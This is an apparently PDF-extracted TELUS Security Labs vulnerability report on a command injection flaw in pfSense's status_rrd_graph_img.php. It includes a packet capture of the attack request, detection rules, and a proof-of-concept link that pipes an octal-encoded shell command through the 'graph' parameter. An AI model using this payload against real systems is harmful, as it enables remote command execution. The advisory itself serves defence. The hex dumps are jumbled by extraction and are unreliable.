00 10 18 75 2e 68 61 32 35 5c 5c 31 7c 48 39 6b 70 70 78 78 77 55 2d 65 61 54 69 2c 72 35

30 36 32 30 31 33 32 36 35 66 33 32

.PV..`.PV.....E. ...L@...}c...... .....P.Yf[....P. ..;D..GET /statu s_rrd_graph_img. php?database=-th roughput.rrd&gra ph=file|printf%2 << suspicious content 0\\164\\157\\165 \\143\\150\\040\ \057\\164\\155\\ 160\\057\\164\\1 45\\163\\164|sh| echo HTTP/1.1..H ost: 172.16.8.19 2..Connection: k eep-alive..Accep t: text/html,app lication/xhtml+x ml,application/x ml;q=0.9,image/w ebp,*/*;q=0.8..U pgrade-InsecureRequests: 1..Use r-Agent: Mozilla /5.0 (Windows NT 6.1) AppleWebKi t/537.36 (KHTML, like Gecko) Chr ome/50.0.2661.75 SID=9ef619062013 b1690743c6265f32 a760....

The server responds: Frame 13: 667 bytes on wire (5336 bits), 667 bytes captured (5336 bits) Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13) Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206) Transmission Control Protocol, Src Port: http (80), Dst Port: 49360 (49360), Seq: 1, Ack: 627, Len: 613 Hypertext Transfer Protocol HTTP/1.1 200 OK\r\n Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n Cache-Control: max-age=180000\r\n Cache-Control: no-store, no-cache, must-revalidate\r\n Cache-Control: post-check=0, pre-check=0\r\n X-Frame-Options: SAMEORIGIN\r\n Content-type: image/png\r\n Last-Modified: Thu, 28 Apr 2016 18:48:52 GMT\r\n Pragma: no-cache\r\n Transfer-Encoding: chunked\r\n Date: Thu, 28 Apr 2016 18:48:52 GMT\r\n Server: lighttpd/1.4.38\r\n \r\n HTTP chunked response Media Type Media Type: image/png (175 bytes) Frame (667 bytes): 0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 0010 02 8d 61 92 40 00 40 06 6d 2a ac 10 08 c0 ac 10


.PV....PV..`..E. ..a.@[email protected]*......

13


0020 08 ce 00 50 0030 02 01 42 dc 0040 30 30 20 4f 0050 53 61 74 2c 0060 20 32 30 3a 0070 78 70 69 72 0080 4a 75 6c 20 0090 30 20 47 4d 00a0 74 72 6f 6c 00b0 30 30 30 30 00c0 72 6f 6c 3a 00d0 6f 2d 63 61 00e0 76 61 6c 69 00f0 43 6f 6e 74 0100 65 63 6b 3d 0110 3d 30 0d 0a 0120 6f 6e 73 3a 0130 0a 43 6f 6e 0140 6d 61 67 65 0150 6f 64 69 66 0160 20 41 70 72 0170 35 32 20 47 0180 6e 6f 2d 63 0190 65 72 2d 45 01a0 6e 6b 65 64 01b0 20 32 38 20 01c0 34 38 3a 35 01d0 72 3a 20 6c [...Truncated for 0260 20 69 6e 20 0270 77 77 2f 73 0280 61 70 68 5f 0290 69 6e 65 20

c0 d0 16 f6 a6 e9 00 00 48 54 54 50 4b 0d 0a 45 78 70 20 33 30 20 41 70 34 38 3a 35 32 20 65 73 3a 20 4d 6f 31 39 39 37 20 30 54 0d 0a 43 61 63 3a 20 6d 61 78 2d 0d 0a 43 61 63 68 20 6e 6f 2d 73 74 63 68 65 2c 20 6d 64 61 74 65 0d 0a 72 6f 6c 3a 20 70 30 2c 20 70 72 65 58 2d 46 72 61 6d 20 53 41 4d 45 4f 74 65 6e 74 2d 74 2f 70 6e 67 0d 0a 69 65 64 3a 20 54 20 32 30 31 36 20 4d 54 0d 0a 50 72 61 63 68 65 0d 0a 6e 63 6f 64 69 6e 0d 0a 44 61 74 65 41 70 72 20 32 30 32 20 47 4d 54 0d 69 67 68 74 74 70 readability...] 2f 75 73 72 2f 6c 74 61 74 75 73 5f 69 6d 67 2e 70 68 31 32 37 32 0a 0d

b4 2f 69 72 47 6e 35 68 61 65 6f 75 43 6f 2d 65 52 79 4c 68 31 61 54 67 3a 31 0a 64

59 31 72 20 4d 2c 3a 65 67 2d 72 73 61 73 63 2d 49 70 61 75 38 67 72 3a 20 36 53 2f

18 32 20 36 45 20 30 6e 38 74 6e 65 2d 68 6b 69 0d 69 4d 38 3a 20 66 75 2c 3a 65 2e

...P.......Yh.P. ..B...HTTP/1.1 2 00 OK..Expires: Sat, 30 Apr 2016 20:48:52 GMT..E xpires: Mon, 26 Jul 1997 05:00:0 0 GMT..Cache-Con trol: max-age=18 0000..Cache-Cont rol: no-store, n o-cache, must-re validate..CacheControl: post-ch eck=0, pre-check =0..X-Frame-Opti ons: SAMEORIGIN. .Content-type: i mage/png..Last-M odified: Thu, 28 Apr 2016 18:48: 52 GMT..Pragma: no-cache..Transf er-Encoding: chu nked..Date: Thu, 28 Apr 2016 18: 48:52 GMT..Serve r: lighttpd/1.4.

6f 63 61 6c 2f 77 72 72 64 5f 67 72 70 20 6f 6e 20 6c 0a

in /usr/local/w ww/status_rrd_gr aph_img.php on l ine 1272...


68 2e 65 32 54 20 30 2d 65 43 65 74 63 74 68 4f 47 65 73 2c 3a 6d 61 20 54 20 65 31

Revision 1.0

cd 31 73 30 0d 32 30 43 3d 6f 2c 2d 68 2d 65 70 49 3a 74 20 34 61 6e 63 68 31 72 2e

50 20 3a 31 0a 36 3a 6f 31 6e 20 72 65 63 63 74 4e 20 2d 32 38 3a 73 68 75 38 76 34

14


Revision 1.0

6. Attack Detection 6.1. Remote Detection of Generic Attacks pfSense enforces HTTPS by default. In order to detect a generic attack using this vulnerability, the detection device must decrypt the HTTPS packets and monitor the HTTP traffic on ports mentioned in the section entitled "Attack Delivery. HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body: Request = Request-Line headers CRLF [message-body] Request-Line = Method SP Request-URI SP HTTP-Version CRLF Headers = *[Header] Header = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents a space character. Parameters can be passed from the client to the server as name-value pairs in either the Request-URI or in the message-body depending on the Method used and Content-Type header. For example, a simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like: GET /my_webapp/mypaget.htm?param=1 HTTP/1.1 Host: www.myhost.com

A corresponding HTTP request using the POST method might look like: POST /my_webapp/mypaget.htm HTTP/1.1 Host: www.myhost.com Content-Type: application/x-www-form-urlencoded Content-Length: 7 param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs: var1=value1&var2=value2...

The detection device must look for HTTP requests to the following URI: /status_rrd_graph_img.php

If a request to this URI is found, the detection device must analyze the value assigned to the request parameter graph. If the value contains a pipe character "|" (or its case-insensitive URL-encoding, %7C), or the grave accent "`" character (or in URL-encoded form, %60), then an attack exploiting this vulnerability is likely underway. Note: All string matching described above must be done in a case-sensitive manner.

6.2. Remote Detection of Known Exploits The generic detection described above is capable of detecting all known exploits for this vulnerability; however, if the detection device would like to isolate cases using the public exploit provided by Francesco Oddo, it can do so by searching for the following strings: String 1: \\145\\143\\150\\157

String 2: \\160\\150\\160


15


Revision 1.0

String 3: |

String 4: status_rrd_graph_img.php

String 5: graph=

If all of these strings are detected then an attack using the public exploit is likely underway.


16


Revision 1.0

7. Exploit Reproduction 7.1. Exploit Overview TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To trigger the vulnerability, click the hyperlink embedded within the HTML. Upon processing, a file named "test" should be created in the "/tmp/" directory of pfSense. Note that before this POC is used the "" string should be replaced with the IP address of the machine running pfSense. The user clicking on the hyperlink should be an authenticated pfSense user.

7.2. Exploit Code TELUS Security Labs PoC /status_rrd_graph_img.php? database=-throughput.rrd&graph=file|printf%20 \\164\\157\\165\\143\\150\\040\\057\\164\\155 \\160\\057\\164\\145\\163\\164|sh|echo"> Click here for PoC


17


Revision 1.0

8. Public Exploits 8.1. Public Exploit [SA] 8.1.1. Exploit overview The discoverer has published a proof of concept exploit demonstrating this vulnerability. The vulnerability has been made available via: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf


18


Revision 1.0

9. Remediation Details The risks posed by this vulnerability can be mitigated or eliminated by: • Applying the vendor-provided patch to eliminate the vulnerability. • Filtering attack traffic using information provided in the "Attack detection" section. • Not visiting untrusted websites. The vendor has released the following advisory regarding this vulnerability: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc


19


Revision 1.0

10. Related Research Not available.


20


Revision 1.0

11. Credits Principal contributors, researchers, and reviewers for this report include the following members of the TELUS Security Labs Research Team: • Vincent Lee • Sivathmican Sivakumaran


21

Vulnerability Report (ESF PfSense Status_rrd_graph_img.php Command Injection)

Recommend Documents